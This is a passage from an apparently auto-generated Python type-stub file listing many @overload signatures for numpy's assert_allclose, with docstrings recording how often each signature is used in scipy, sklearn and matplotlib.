def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["dx=3"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["dx=4"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["dx=5"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["dx=6"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["dx=7"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["dx=8"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["dx=9"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=1 k=0"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=2 k=0"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=2 k=1"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=3 k=0"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=3 k=1"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=3 k=2"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=4 k=0"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=4 k=1"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=4 k=2"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=4 k=3"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=5 k=0"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=5 k=1"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=5 k=2"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=5 k=3"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=5 k=4"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=6 k=0"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=6 k=1"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=6 k=2"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=6 k=3"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=6 k=4"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=6 k=5"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=7 k=0"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=7 k=1"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=7 k=2"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=7 k=3"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=7 k=4"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=7 k=5"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=7 k=6"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=8 k=0"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=8 k=1"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=8 k=2"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=8 k=3"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=8 k=4"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=8 k=5"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=8 k=6"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=8 k=7"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=9 k=0"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=9 k=1"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=9 k=2"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=9 k=3"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=9 k=4"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=9 k=5"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=9 k=6"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=9 k=7"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
err_msg: Literal["dx=9 k=8"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: int, atol: float, err_msg: str):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[int]):
"""
usage.matplotlib: 4
usage.scipy: 68
usage.sklearn: 9
"""
...
@overload
def assert_allclose(
actual: numpy.float64, desired: numpy.ndarray, rtol: float, atol: float
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(actual: List[numpy.ndarray], desired: List[numpy.float64]):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[numpy.float64]):
"""
usage.scipy: 4
usage.sklearn: 4
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["None"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["(0, 0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["(0, 1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["(1, 0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["(2, 3)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["(9, 2)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["(0, 0, 0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["(0, 1, 0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["(1, 0, 0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["(2, 3, 0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["(6, 0, 2)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: float,
rtol: float,
atol: float,
err_msg: Literal["[(0, 1), (0, 1)]"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: float,
rtol: float,
atol: float,
err_msg: Literal["[(0, 0.5), (0, 1)]"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: float,
rtol: float,
atol: float,
err_msg: Literal["[(0, 1), (0, 0.5)]"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: float, rtol: float, atol: float, err_msg: str
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["nearest"]
):
"""
usage.scipy: 3
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["linear"]
):
"""
usage.scipy: 3
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["splinef2d"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.matrix, desired: numpy.ndarray):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["('nearest', True)"],
):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["('nearest', False)"],
):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["('linear', True)"],
):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["('linear', False)"],
):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["('cubic', True)"],
):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["('cubic', False)"],
):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["nearest"],
):
"""
usage.scipy: 10
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["linear"],
):
"""
usage.scipy: 7
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["cubic"],
):
"""
usage.scipy: 7
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["cubic"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: List[Union[int, complex]], desired: numpy.ndarray):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(actual: List[Union[complex, int]], desired: numpy.ndarray):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.float64, rtol: float, atol: float
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.float64, desired: numpy.float64, rtol: float, atol: float
):
"""
usage.scipy: 11
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.complex128, desired: numpy.complex128, rtol: float, atol: float
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: complex, rtol: float, atol: float):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(actual: numpy.float32, desired: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[Union[float, int]]):
"""
usage.matplotlib: 2
usage.scipy: 15
usage.sklearn: 1
"""
...
@overload
def assert_allclose(actual: complex, desired: numpy.complex128, rtol: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: gelsd"],
):
"""
usage.scipy: 16
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: gelss"],
):
"""
usage.scipy: 16
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: gelsy"],
):
"""
usage.scipy: 16
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: None"],
):
"""
usage.scipy: 16
"""
...
@overload
def assert_allclose(
actual: numpy.float32,
desired: numpy.float32,
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: gelsd"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: Tuple[float, float],
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: gelsd"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.float32,
desired: numpy.float32,
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: gelss"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: Tuple[float, float],
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: gelss"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.float32,
desired: numpy.float32,
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: gelsy"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: Tuple[float, float],
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: gelsy"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.float32,
desired: numpy.float32,
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: None"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: Tuple[float, float],
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: None"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: numpy.float64,
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: gelsd"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: numpy.float64,
rtol: numpy.float64,
atol: numpy.float64,
err_msg: Literal["driver: gelss"],
):
"""
usage.scipy: 2
"""
...
# NOTE(review): auto-generated assert_allclose @overload stubs (docstrings are
# recorded per-project usage counts); "-> None" added since numpy.testing.
# assert_allclose returns None and raises AssertionError on mismatch.
@overload
def assert_allclose(
    actual: numpy.float64,
    desired: numpy.float64,
    rtol: numpy.float64,
    atol: numpy.float64,
    err_msg: Literal["driver: gelsy"],
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.float64,
    desired: numpy.float64,
    rtol: numpy.float64,
    atol: numpy.float64,
    err_msg: Literal["driver: None"],
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.float128,
    desired: numpy.float64,
    rtol: numpy.float64,
    atol: numpy.float64,
    err_msg: Literal["driver: gelsd"],
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.float128,
    desired: numpy.float64,
    rtol: numpy.float64,
    atol: numpy.float64,
    err_msg: Literal["driver: gelss"],
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.float128,
    desired: numpy.float128,
    rtol: numpy.float64,
    atol: numpy.float64,
    err_msg: Literal["driver: gelsy"],
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.float128,
    desired: numpy.float64,
    rtol: numpy.float64,
    atol: numpy.float64,
    err_msg: Literal["driver: None"],
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray,
    desired: Tuple[complex, complex],
    rtol: numpy.float64,
    atol: numpy.float64,
    err_msg: Literal["driver: gelsd"],
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray,
    desired: Tuple[complex, complex],
    rtol: numpy.float64,
    atol: numpy.float64,
    err_msg: Literal["driver: gelss"],
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.float32,
    desired: numpy.complex64,
    rtol: numpy.float64,
    atol: numpy.float64,
    err_msg: Literal["driver: gelsy"],
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray,
    desired: Tuple[complex, complex],
    rtol: numpy.float64,
    atol: numpy.float64,
    err_msg: Literal["driver: gelsy"],
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray,
    desired: Tuple[complex, complex],
    rtol: numpy.float64,
    atol: numpy.float64,
    err_msg: Literal["driver: None"],
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.float64,
    desired: numpy.complex128,
    rtol: numpy.float64,
    atol: numpy.float64,
    err_msg: Literal["driver: gelsy"],
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.float128,
    desired: numpy.complex256,
    rtol: numpy.float64,
    atol: numpy.float64,
    err_msg: Literal["driver: gelsy"],
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray,
    desired: Tuple[float, float, float],
    rtol: numpy.float64,
    atol: numpy.float64,
    err_msg: Literal["driver: gelsd"],
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray,
    desired: Tuple[float, float, float],
    rtol: numpy.float64,
    atol: numpy.float64,
    err_msg: Literal["driver: gelss"],
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray,
    desired: Tuple[float, float, float],
    rtol: numpy.float64,
    atol: numpy.float64,
    err_msg: Literal["driver: gelsy"],
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray,
    desired: Tuple[float, float, float],
    rtol: numpy.float64,
    atol: numpy.float64,
    err_msg: Literal["driver: None"],
) -> None:
    """
    usage.scipy: 2
    """
    ...
# NOTE(review): auto-generated assert_allclose @overload stubs (docstrings are
# recorded per-project usage counts); "-> None" added since numpy.testing.
# assert_allclose returns None and raises AssertionError on mismatch.
@overload
def assert_allclose(actual: numpy.float16, desired: numpy.float64, rtol: numpy.float64) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(actual: float, desired: numpy.float64, rtol: numpy.float64) -> None:
    """
    usage.scipy: 4
    """
    ...
@overload
def assert_allclose(actual: numpy.float128, desired: numpy.float64, rtol: float) -> None:
    """
    usage.scipy: 4
    """
    ...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[List[float]]) -> None:
    """
    usage.scipy: 2
    usage.sklearn: 2
    """
    ...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[List[List[float]]]) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(actual: int, desired: int) -> None:
    """
    usage.scipy: 2
    usage.sklearn: 1
    """
    ...
@overload
def assert_allclose(actual: numpy.ndarray, desired: numpy.ndarray, atol: numpy.float64) -> None:
    """
    usage.scipy: 81
    """
    ...
@overload
def assert_allclose(actual: complex, desired: complex, rtol: int) -> None:
    """
    usage.scipy: 8
    """
    ...
@overload
def assert_allclose(actual: float, desired: float, rtol: int) -> None:
    """
    usage.scipy: 16
    """
    ...
@overload
def assert_allclose(actual: numpy.complex128, desired: int) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: int, rtol: float, atol: float, err_msg: str
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(actual: numpy.ndarray, desired: numpy.ndarray, err_msg: str) -> None:
    """
    usage.scipy: 28
    usage.sklearn: 38
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: float, rtol: float, atol: numpy.float64
) -> None:
    """
    usage.scipy: 6
    """
    ...
@overload
def assert_allclose(actual: List[Union[int, float]], desired: numpy.ndarray) -> None:
    """
    usage.matplotlib: 1
    usage.scipy: 4
    """
    ...
@overload
def assert_allclose(actual: List[Union[float, int]], desired: numpy.ndarray) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(actual: List[complex], desired: numpy.ndarray) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(actual: List[float], desired: numpy.ndarray) -> None:
    """
    usage.scipy: 11
    """
    ...
@overload
def assert_allclose(actual: numpy.ndarray, desired: numpy.float32, atol: numpy.float64) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(actual: numpy.ndarray, desired: numpy.float64, atol: numpy.float64) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.complex64, atol: numpy.float64
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.complex128, atol: numpy.float64
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(actual: numpy.ndarray, desired: int, atol: numpy.float64) -> None:
    """
    usage.scipy: 11
    """
    ...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[float], atol: float) -> None:
    """
    usage.scipy: 18
    """
    ...
@overload
def assert_allclose(actual: numpy.ndarray, desired: float, rtol: float) -> None:
    """
    usage.scipy: 17
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: List[Union[int, float]], atol: float
) -> None:
    """
    usage.scipy: 5
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.ndarray, rtol: int, atol: numpy.float64
) -> None:
    """
    usage.scipy: 5
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.ndarray, rtol: float, err_msg: str
) -> None:
    """
    usage.scipy: 12
    """
    ...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[List[int]], atol: float) -> None:
    """
    usage.scipy: 6
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: List[List[int]], atol: numpy.float64
) -> None:
    """
    usage.scipy: 10
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: List[List[Union[int, complex]]], atol: numpy.float64
) -> None:
    """
    usage.scipy: 10
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: List[List[Union[complex, int]]], atol: numpy.float64
) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(actual: numpy.ndarray, desired: numpy.ndarray, rtol: numpy.float64) -> None:
    """
    usage.scipy: 32
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray,
    desired: numpy.ndarray,
    rtol: numpy.float64,
    atol: numpy.float64,
) -> None:
    """
    usage.scipy: 12
    """
    ...
@overload
def assert_allclose(actual: complex, desired: float) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(actual: complex, desired: complex) -> None:
    """
    usage.scipy: 2
    """
    ...
@overload
def assert_allclose(
    actual: Tuple[numpy.ndarray, numpy.ndarray], desired: List[List[int]], atol: float
) -> None:
    """
    usage.scipy: 16
    """
    ...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[int], atol: float) -> None:
    """
    usage.scipy: 21
    """
    ...
@overload
def assert_allclose(
    actual: Tuple[numpy.ndarray, numpy.ndarray],
    desired: List[List[Union[int, complex]]],
    atol: float,
) -> None:
    """
    usage.scipy: 12
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: List[List[Union[int, float]]], atol: float
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: List[List[Union[complex, int]]], atol: float
) -> None:
    """
    usage.scipy: 7
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: List[List[Union[complex, float, int]]], atol: float
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(actual: numpy.complex128, desired: numpy.complex128) -> None:
    """
    usage.scipy: 7
    """
    ...
@overload
def assert_allclose(actual: numpy.complex128, desired: complex) -> None:
    """
    usage.scipy: 12
    """
    ...
@overload
def assert_allclose(actual: List[Union[numpy.float64, int]], desired: numpy.ndarray) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(actual: List[Union[numpy.complex128, int]], desired: numpy.ndarray) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["#0 failed"]
) -> None:
    """
    usage.scipy: 3
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["#1 failed"]
) -> None:
    """
    usage.scipy: 3
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["#2 failed"]
) -> None:
    """
    usage.scipy: 3
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["#3 failed"]
) -> None:
    """
    usage.scipy: 3
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: numpy.ndarray, err_msg: Literal["#4 failed"]
) -> None:
    """
    usage.scipy: 3
    """
    ...
@overload
def assert_allclose(actual: numpy.int64, desired: int) -> None:
    """
    usage.scipy: 10
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray,
    desired: Tuple[int, int, int, int, int, int, int, int, int, int],
    atol: float,
) -> None:
    """
    usage.scipy: 3
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray,
    desired: Tuple[float, float, float, float, float, float, float],
    atol: float,
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray,
    desired: Tuple[
        float, float, float, float, float, float, float, float, float, float
    ],
    atol: float,
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(actual: numpy.ndarray, desired: Tuple[float, float], atol: float) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(
    actual: numpy.ndarray, desired: List[Union[float, numpy.float64]], atol: float
) -> None:
    """
    usage.scipy: 1
    """
    ...
@overload
def assert_allclose(actual: numpy.ndarray, desired: numpy.float64, rtol: float) -> None:
    """
    usage.scipy: 8
